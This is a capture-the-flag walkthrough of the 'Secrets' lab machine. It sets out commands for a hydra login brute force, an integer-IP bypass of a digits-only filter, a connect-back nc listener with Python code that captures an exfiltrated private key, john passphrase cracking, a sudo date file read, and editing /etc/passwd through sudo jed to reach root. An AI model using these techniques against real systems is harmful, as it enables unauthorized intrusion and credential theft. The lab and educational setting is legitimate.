# Lab Setup

Download: Secrets

Network: NAT, IP: 192.168.1.169

# Penetration Process

# Initial Information Gathering

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6b:36:d8:be:ac:24:39:bf:ba:a9:a7:17:e1:5e:00:f2 (RSA)
|   256 1d:20:e4:4b:a4:e7:08:71:eb:d3:41:e1:ee:94:1c:61 (ECDSA)
|_  256 e3:93:6f:b3:0b:a3:c3:0e:f7:0d:4c:b6:db:3c:ed:90 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)

Viewing the source of the port 80 homepage (F12) reveals the username brad.

Directory enumeration finds a login page: http://192.168.1.169/secrets/login_form.php

Brute-force the login with hydra against the form's POST handler, using "Invalid Credentials" as the failure string:

hydra -l brad -P /usr/share/wordlists/rockyou.txt 192.168.1.169 http-post-form "/secrets/MK67IT044XYGGIIWLGS9.php:user=^USER^&password=^PASS^:Invalid Credentials" -I -t 64

Credentials obtained: brad/bradley

After logging in there is a command-execution feature, but the input field only accepts digits.

An IPv4 address can also be written as a single 32-bit integer (the four octets packed big-endian): 3232235905 decodes to 192.168.1.129, the attacking host. Plenty of online converters do this. The integer spelling contains only digits, so it passes the input check while still naming our machine.
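As an added example (not code from the original writeup), the conversion in both directions, cross-checked against inet_aton, plus the reason the trick works: the libc resolver accepts a bare integer as an address, so a filter that only allows digits does not stop a connect-back. The DIGITS_ONLY regex is an assumption about the shape of the target's check, whose code the page does not show; 192.168.1.129 is what 3232235905 decodes to.

```python
import re
import socket
import struct

# Assumed shape of the target's "numbers only" input check (the page does not show its code).
DIGITS_ONLY = re.compile(r"^[0-9]+$")


def ip_to_int(ip: str) -> int:
    """Dotted-quad IPv4 -> 32-bit integer, first octet most significant."""
    octets = ip.split(".")
    if len(octets) != 4:
        raise ValueError(f"not a dotted quad: {ip!r}")
    value = 0
    for octet in octets:
        if not (octet.isascii() and octet.isdigit()) or int(octet) > 255:
            raise ValueError(f"bad octet {octet!r} in {ip!r}")
        value = (value << 8) | int(octet)
    return value


def int_to_ip(value: int) -> str:
    """32-bit integer -> dotted-quad IPv4 (inverse of ip_to_int)."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError(f"outside IPv4 range: {value}")
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def ip_to_int_libc(ip: str) -> int:
    """Same conversion through inet_aton, as an independent cross-check."""
    return struct.unpack("!I", socket.inet_aton(ip))[0]


def integer_form_is_same_address(value: int) -> bool:
    """inet_aton also parses a bare integer, so "3232235905" reaches 192.168.1.129."""
    return socket.inet_aton(str(value)) == socket.inet_aton(int_to_ip(value))


def passes_digits_only_filter(s: str) -> bool:
    """Mimics the server-side check: only the integer spelling of an address gets through."""
    return DIGITS_ONLY.match(s) is not None


if __name__ == "__main__":
    attacker = "192.168.1.129"  # what 3232235905 decodes to
    n = ip_to_int(attacker)
    assert n == ip_to_int_libc(attacker)
    print(f"{attacker} -> {n} -> {int_to_ip(n)}")
    print(f"filter accepts dotted form:  {passes_digits_only_filter(attacker)}")
    print(f"filter accepts integer form: {passes_digits_only_filter(str(n))}")
    print(f"integer form names the same host: {integer_form_is_same_address(n)}")
```

The same reasoning covers hex (0xC0A80181) and octal spellings, which inet_aton also accepts; a digits-only filter blocks those, but any allow-list on the *format* of an address is no substitute for deciding whether the destination itself is acceptable.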

Sniffing the interface (for example in Wireshark) shows the server connecting back to port 6666 on our host. Nothing is listening there yet, so the capture shows a red RST,ACK: the connection is refused.

Start a listener on port 6666 with nc (nc -lvnp 6666), resend the request, and the server connects back and hands over an RSA private key.
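As an added example (not from the original writeup), a Python listener that does what the nc step does and adds two things worth having when catching a key: it writes the capture with mode 0600 (ssh refuses keys with looser permissions) and checks that what arrived actually carries a private-key header. The port and the bind address follow the writeup; FAKE_KEY and demo_loopback are constructed so the capture path can be exercised offline, and FAKE_KEY is not the key from the box.

```python
import os
import socket
import tempfile
import threading

# Headers of the two formats an OpenSSH client key is normally stored in.
PEM_MARKERS = (
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN OPENSSH PRIVATE KEY-----",
)


def looks_like_private_key(data: bytes) -> bool:
    """True if the captured bytes contain a PEM/OpenSSH private-key header."""
    return any(marker in data for marker in PEM_MARKERS)


def start_listener(bind_addr: str = "0.0.0.0", port: int = 6666) -> socket.socket:
    """Bind and listen; port 0 lets the OS pick a free port (used by the loopback demo)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_addr, port))
    srv.listen(1)
    return srv


def receive_one(srv: socket.socket, out_path: str, timeout: float = 60.0) -> bytes:
    """Accept a single connection, read until the peer closes, save the bytes with mode 0600."""
    srv.settimeout(timeout)
    conn, _peer = srv.accept()
    chunks = []
    with conn:
        conn.settimeout(timeout)
        while True:
            buf = conn.recv(4096)
            if not buf:  # peer closed: the target sends the key and hangs up
                break
            chunks.append(buf)
    srv.close()
    data = b"".join(chunks)
    # Create the file with owner-only permissions from the start rather than chmod afterwards.
    fd = os.open(out_path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return data


# Constructed stand-in for what the target sends back; not the real key from the machine.
FAKE_KEY = (
    b"-----BEGIN RSA PRIVATE KEY-----\n"
    b"Proc-Type: 4,ENCRYPTED\n"
    b"DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
    b"MIIEpAIBAAKCAQEAconstructedplaceholder\n"
    b"-----END RSA PRIVATE KEY-----\n"
)


def demo_loopback() -> tuple:
    """Run the listener and a fake 'target' on 127.0.0.1 to exercise the capture path."""
    srv = start_listener("127.0.0.1", 0)
    port = srv.getsockname()[1]
    out_path = os.path.join(tempfile.mkdtemp(), "id_rsa")

    def fake_target():
        # The target connects back and sends the key, then closes (end of the with block).
        with socket.create_connection(("127.0.0.1", port)) as c:
            c.sendall(FAKE_KEY)

    t = threading.Thread(target=fake_target)
    t.start()
    data = receive_one(srv, out_path)
    t.join()
    mode = os.stat(out_path).st_mode & 0o777
    return data, looks_like_private_key(data), mode


if __name__ == "__main__":
    captured, is_key, mode = demo_loopback()
    print(f"captured {len(captured)} bytes, private key header: {is_key}, file mode: {oct(mode)}")
```

For the real capture, call `receive_one(start_listener(), "id_rsa")` on the attacking host and resend the request in the web form; the `Proc-Type: 4,ENCRYPTED` header in the constructed sample is what a passphrase-protected PEM key looks like, which is the case the next step handles with john.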

The key is passphrase-protected, so convert it with ssh2john, crack the passphrase with john, and SSH in with the key:

┌──(root㉿kali)-[~]
└─# ssh2john id_rsa > id_rsa.hash                            
┌──(root㉿kali)-[~]
└─# john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
security         (id_rsa)     
1g 0:00:00:00 DONE (2024-06-01 08:36) 100.0g/s 307200p/s 307200c/s 307200C/s qwertyui..dangerous
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
┌──(root㉿kali)-[~]
└─# ssh -i id_rsa brad@192.168.1.169
Enter passphrase for key 'id_rsa': 
Linux secrets 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
brad@secrets:~$ id
uid=1000(brad) gid=1000(brad) grupos=1000(brad)

# Privilege Escalation

brad@secrets:~$ sudo -l
Matching Defaults entries for brad on secrets:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User brad may run the following commands on secrets:
    (fabian) NOPASSWD: /usr/bin/date
brad@secrets:~$ sudo -u fabian /usr/bin/date -f /home/fabian/.bash_history
/usr/bin/date: fecha inválida «cd ~»
/usr/bin/date: fecha inválida «ls -la»
/usr/bin/date: fecha inválida «passwd fabian»
/usr/bin/date: fecha inválida «s3cr3t$$$L0v3$$
/usr/bin/date: fecha inválida «exit -y»
brad@secrets:~$

date -f reads each line of the given file as a date string and echoes back every line it cannot parse, so this sudo rule is an arbitrary file read as fabian: fabian's .bash_history shows the password being set with passwd. Switch user with su fabian and that password.

fabian can run the jed editor as root without a password, and an editor running as root can rewrite any file. Generate a crypt hash of the password 123456 with openssl passwd (with no algorithm flag it emits the traditional 13-character DES crypt hash, which is enough here), then use sudo jed /etc/passwd to replace the x in root's password field with that hash. Once a hash is present directly in /etc/passwd the shadow entry is no longer consulted, so su root with 123456 succeeds. Keep a copy of the original root line so the entry can be restored afterwards.

fabian@secrets:/home/brad$ sudo -l
Matching Defaults entries for fabian on secrets:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fabian may run the following commands on secrets:
    (root) NOPASSWD: /usr/bin/jed
fabian@secrets:/home/brad$ openssl passwd
Password: 
Verifying - Password: 
aKf1ZCGGeZ0/A
fabian@secrets:/home/brad$ sudo jed /etc/passwd
fabian@secrets:/home/brad$ su root
Contraseña: 
root@secrets:/home/brad# cat /root/root.txt 
cfd58a2c97ff992fd7777c5e1baf8265